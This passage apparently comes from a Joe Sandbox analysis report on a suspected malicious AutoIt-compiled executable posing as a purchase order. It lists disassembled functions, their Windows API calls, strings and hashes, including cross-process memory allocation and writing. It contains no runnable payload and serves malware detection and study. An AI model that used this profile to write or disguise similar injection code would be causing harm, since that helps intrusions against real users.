                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                • String ID:
                                • API String ID: 3741023627-0
                                • Opcode ID: 61c168d5ba03c7aaabecb895d54a4a86fcd26dc61b36cba3664dd5106a27d5e0
                                • Instruction ID: e3dcab7e899e61fb01312033fd6db4893d599fc4163af640aded9e4908bcc629
                                • Opcode Fuzzy Hash: 61c168d5ba03c7aaabecb895d54a4a86fcd26dc61b36cba3664dd5106a27d5e0
                                • Instruction Fuzzy Hash: 61018130500B44ABEB245B50DD8EFEA7BBEBB04B05F000559E583A55E1DBF0A9898BD0
                                Function 001822A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 001822BE
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 001822D0
                                • _free.LIBCMT ref: 001822E3
                                • _free.LIBCMT ref: 001822F4
                                • _free.LIBCMT ref: 00182305
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 2253b49d67bf9e44c06f505277f11ad871e710050b80465cff6056c6cfb44e0a
                                • Instruction ID: 107266f03a7132f327449c6597ddb6fe465b9aa4763c1166d01daab8b524b9b5
                                • Opcode Fuzzy Hash: 2253b49d67bf9e44c06f505277f11ad871e710050b80465cff6056c6cfb44e0a
                                • Instruction Fuzzy Hash: 3CF030B4880130AB8623BFD4BC498483B65B7387507122606F814D3272CF3416639FA4
                                Function 001695C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • EndPath.GDI32(?), ref: 001695D4
                                • StrokeAndFillPath.GDI32(?,?,001A71F7,00000000,?,?,?), ref: 001695F0
                                • SelectObject.GDI32(?,00000000), ref: 00169603
                                • DeleteObject.GDI32 ref: 00169616
                                • StrokePath.GDI32(?), ref: 00169631
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                • String ID:
                                • API String ID: 2625713937-0
                                • Opcode ID: de59e9464d4e1be9db61c502809dd9f6839b8909dedc0c1e2b735deb374f4970
                                • Instruction ID: 4c524640da1133d827d86fe88e92990ec3bcc0cd4ca179ec3a1cad6367edb3fb
                                • Opcode Fuzzy Hash: de59e9464d4e1be9db61c502809dd9f6839b8909dedc0c1e2b735deb374f4970
                                • Instruction Fuzzy Hash: B2F0C9350053C8EBDB265FA9ED5CB683B65AB11322F049214F465594F0C73089F7DF60
                                Function 00180F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: __freea$_free
                                • String ID: a/p$am/pm
                                • API String ID: 3432400110-3206640213
                                • Opcode ID: 162ae20fbf80fe996205bb6fa14d8d49e0f359ea18329e70d1903acecf63fb78
                                • Instruction ID: 6a427964ef79f1e446761cf10dcdfe939daafe30cd2ebca6cab6a48620859363
                                • Opcode Fuzzy Hash: 162ae20fbf80fe996205bb6fa14d8d49e0f359ea18329e70d1903acecf63fb78
                                • Instruction Fuzzy Hash: BED10433900206EACB28BF68C845BFAB7B9FF16710F294159E9059B650D3759F82CF51
                                Function 001D61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00170242: EnterCriticalSection.KERNEL32(0022070C,00221884,?,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017024D
                                  • Part of subcall function 00170242: LeaveCriticalSection.KERNEL32(0022070C,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017028A
                                  • Part of subcall function 001700A3: __onexit.LIBCMT ref: 001700A9
                                • __Init_thread_footer.LIBCMT ref: 001D6238
                                  • Part of subcall function 001701F8: EnterCriticalSection.KERNEL32(0022070C,?,?,00168747,00222514), ref: 00170202
                                  • Part of subcall function 001701F8: LeaveCriticalSection.KERNEL32(0022070C,?,00168747,00222514), ref: 00170235
                                  • Part of subcall function 001C359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001C35E4
                                  • Part of subcall function 001C359C: LoadStringW.USER32(00222390,?,00000FFF,?), ref: 001C360A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                • String ID: x#"$x#"$x#"
                                • API String ID: 1072379062-2717048500
                                • Opcode ID: c1b0d11d938caecbb6b12a2d6c1228134ae33c9d6c59a267ab590595a0f2fdd2
                                • Instruction ID: bfa7aa91f0c1e63cc613c375ecdcdee27f9cb44ede8b36ed7d4e646dc2912c9d
                                • Opcode Fuzzy Hash: c1b0d11d938caecbb6b12a2d6c1228134ae33c9d6c59a267ab590595a0f2fdd2
                                • Instruction Fuzzy Hash: 31C16A71A00205AFCB14DF98D891EBEB7B9EF58340F10816AF915AB391DB70E985CB90
                                Function 001D7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00170242: EnterCriticalSection.KERNEL32(0022070C,00221884,?,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017024D
                                  • Part of subcall function 00170242: LeaveCriticalSection.KERNEL32(0022070C,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017028A
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001700A3: __onexit.LIBCMT ref: 001700A9
                                • __Init_thread_footer.LIBCMT ref: 001D7BFB
                                  • Part of subcall function 001701F8: EnterCriticalSection.KERNEL32(0022070C,?,?,00168747,00222514), ref: 00170202
                                  • Part of subcall function 001701F8: LeaveCriticalSection.KERNEL32(0022070C,?,00168747,00222514), ref: 00170235
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                • String ID: 5$G$Variable must be of type 'Object'.
                                • API String ID: 535116098-3733170431
                                • Opcode ID: 81216e97563e770b0cacdac0b8d425ae43eef962cb006afcc9b9c33f58501b3a
                                • Instruction ID: 2bb7329ad05a93c68b79b5e72f6bb6aacdf846d9924152d66c3431f61775a775
                                • Opcode Fuzzy Hash: 81216e97563e770b0cacdac0b8d425ae43eef962cb006afcc9b9c33f58501b3a
                                • Instruction Fuzzy Hash: 3A918B71A04609EFCB14EF94D891DADB7B2FF59300F50805AF806AB392EB71AE45CB51
                                Function 001B2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001BB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001B21D0,?,?,00000034,00000800,?,00000034), ref: 001BB42D
                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001B2760
                                  • Part of subcall function 001BB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001B21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 001BB3F8
                                  • Part of subcall function 001BB32A: GetWindowThreadProcessId.USER32(?,?), ref: 001BB355
                                  • Part of subcall function 001BB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001B2194,00000034,?,?,00001004,00000000,00000000), ref: 001BB365
                                  • Part of subcall function 001BB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001B2194,00000034,?,?,00001004,00000000,00000000), ref: 001BB37B
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001B27CD
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001B281A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                • String ID: @
                                • API String ID: 4150878124-2766056989
                                • Opcode ID: 2116ec2efc49bd195ccf14a50201a144ab3cb7d4e618b75d7f7b3af22e78c2db
                                • Instruction ID: 51ce2d8a171ee64ab2b5187b5b6f20aa083fb550fe0eb2cd5cef0171e9208ecd
                                • Opcode Fuzzy Hash: 2116ec2efc49bd195ccf14a50201a144ab3cb7d4e618b75d7f7b3af22e78c2db
                                • Instruction Fuzzy Hash: 25410B76900218AFDB10DBA4CD85AEEBBB8AF19700F104095FA55B7191DB706E89CBA1
                                Function 0018172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO2-2401-0016 (TR).exe,00000104), ref: 00181769
                                • _free.LIBCMT ref: 00181834
                                • _free.LIBCMT ref: 0018183E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe
                                • API String ID: 2506810119-3296224652
                                • Opcode ID: 20dbab01b37013ac8751977ca752f9e95c8b61901e9df788cbc846e0edb112c0
                                • Instruction ID: 25b1637e87d1ea04a8131f135ee3485f8733aac8d797f9f7df5d295462f39acd
                                • Opcode Fuzzy Hash: 20dbab01b37013ac8751977ca752f9e95c8b61901e9df788cbc846e0edb112c0
                                • Instruction Fuzzy Hash: 46318E72A00218FBDB21EB999885D9EBBFCEBA5310B1041AAF80497211D7708F42CF90
                                Function 001BC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001BC306
                                • DeleteMenu.USER32(?,00000007,00000000), ref: 001BC34C
                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00221990,00E16D80), ref: 001BC395
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$Delete$InfoItem
                                • String ID: 0
                                • API String ID: 135850232-4108050209
                                • Opcode ID: 501a6b8ced9f348cc5f2ab86fab17f6472a3952dbd62d5fe6d05180bbe4a62a1
                                • Instruction ID: 194bb264b45e44a142006ff3f8f18a22a391342694e33586f5769a1dbbed6b14
                                • Opcode Fuzzy Hash: 501a6b8ced9f348cc5f2ab86fab17f6472a3952dbd62d5fe6d05180bbe4a62a1
                                • Instruction Fuzzy Hash: D341AE312043419FD724DF25D884F9BBBE4BF95320F048A1EF8A59B2E1D770A904CBA2
                                Function 001E4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001ECC08,00000000,?,?,?,?), ref: 001E44AA
                                • GetWindowLongW.USER32 ref: 001E44C7
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001E44D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Long
                                • String ID: SysTreeView32
                                • API String ID: 847901565-1698111956
                                • Opcode ID: 17955d300f21d9198d66d35a70e32a25e6088c222b784d9d642d671db42a6d95
                                • Instruction ID: 4f948de105af6f83bcd7a292fd7c517870a6fff8396bcedd57766362a476087a
                                • Opcode Fuzzy Hash: 17955d300f21d9198d66d35a70e32a25e6088c222b784d9d642d671db42a6d95
                                • Instruction Fuzzy Hash: 35319C32210A85AFDB208E79DC45BEA77A9EF08334F204325F975921D0D770AC519790
                                Function 001D304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001D335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001D3077,?,?), ref: 001D3378
                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001D307A
                                • _wcslen.LIBCMT ref: 001D309B
                                • htons.WSOCK32(00000000,?,?,00000000), ref: 001D3106
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                • String ID: 255.255.255.255
                                • API String ID: 946324512-2422070025
                                • Opcode ID: fed38efe02cac8b68d036469b11cb5287a50e4a2b2ba62b4e4e72457dd62ba2c
                                • Instruction ID: 36302389bd5b74fc7963aeda48b6f4581fe5c78bd5deb5353fde337ffd33a6ed
                                • Opcode Fuzzy Hash: fed38efe02cac8b68d036469b11cb5287a50e4a2b2ba62b4e4e72457dd62ba2c
                                • Instruction Fuzzy Hash: 8D31E739200206DFC710CF68C985EA977F0EF54318F25815AE9258F792D771EE45C762
                                Function 001E4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001E4705
                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001E4713
                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001E471A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$DestroyWindow
                                • String ID: msctls_updown32
                                • API String ID: 4014797782-2298589950
                                • Opcode ID: 9445f19e3b451023975e108c6747f6949870f3ccc3e210c36d671110fa1eaf0c
                                • Instruction ID: dcb127bb1972fdd92ed84acc346042486dc44a093492411b7665f8c063e11d23
                                • Opcode Fuzzy Hash: 9445f19e3b451023975e108c6747f6949870f3ccc3e210c36d671110fa1eaf0c
                                • Instruction Fuzzy Hash: A42160B5600648AFDB10DF65DCC1DAB37EDEF5A7A4B040059FA009B351CB70EC62CAA0
                                Function 001B95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen
                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                • API String ID: 176396367-2734436370
                                • Opcode ID: 00ad8b5995748cf86d7e32632641ebe1f4a9e0f6e0caccfed0140c0d025ea152
                                • Instruction ID: 08d58ab944dd2d163dffa6f409810c5fcdfc3863f4d01ead0195c5f079be93af
                                • Opcode Fuzzy Hash: 00ad8b5995748cf86d7e32632641ebe1f4a9e0f6e0caccfed0140c0d025ea152
                                • Instruction Fuzzy Hash: 0D216A32244650A6D331AB25EC06FFB73E8AFA5300F10802AFF499B081EB51AD57C2D5
                                Function 001E37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001E3840
                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001E3850
                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001E3876
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$MoveWindow
                                • String ID: Listbox
                                • API String ID: 3315199576-2633736733
                                • Opcode ID: 902d0cd89c69e3caa52ac9ccaf1e7a7b522e829fe37bdf703a4c42d8b240ca3b
                                • Instruction ID: c6b3af4d9b76458da474c0d44e8630a58ffee346f63180ec1bd1da2dd3f0f71e
                                • Opcode Fuzzy Hash: 902d0cd89c69e3caa52ac9ccaf1e7a7b522e829fe37bdf703a4c42d8b240ca3b
                                • Instruction Fuzzy Hash: 95218072610158BBEB218F96DC89EAF376AEF99750F118124F9149B190C771DC5287A0
                                Function 001C49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C4A08
                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001C4A5C
                                • SetErrorMode.KERNEL32(00000000,?,?,001ECC08), ref: 001C4AD0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorMode$InformationVolume
                                • String ID: %lu
                                • API String ID: 2507767853-685833217
                                • Opcode ID: 2011558527290d1fe8a3e3c8fe38caf8e63b1b3159c92361473511acfa11f66a
                                • Instruction ID: 274e549ec4d2a4b158e85a112dadda25490d7f5c1a6a5db5bdf618cb7d555f1d
                                • Opcode Fuzzy Hash: 2011558527290d1fe8a3e3c8fe38caf8e63b1b3159c92361473511acfa11f66a
                                • Instruction Fuzzy Hash: A7312D75A00109EFDB10DF54C885EAA77E8EF15308F148099E905DF252D771ED46CBA1
                                Function 001E41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001E424F
                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001E4264
                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001E4271
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: msctls_trackbar32
                                • API String ID: 3850602802-1010561917
                                • Opcode ID: 256f8d92df48c74b7ab759dd77d445611d8363fc571a1b77503eb1e69e51c881
                                • Instruction ID: 3c6b4881a58c3e623445cdec4c664c663ae3b4479144e521d80e5917a8b9eb99
                                • Opcode Fuzzy Hash: 256f8d92df48c74b7ab759dd77d445611d8363fc571a1b77503eb1e69e51c881
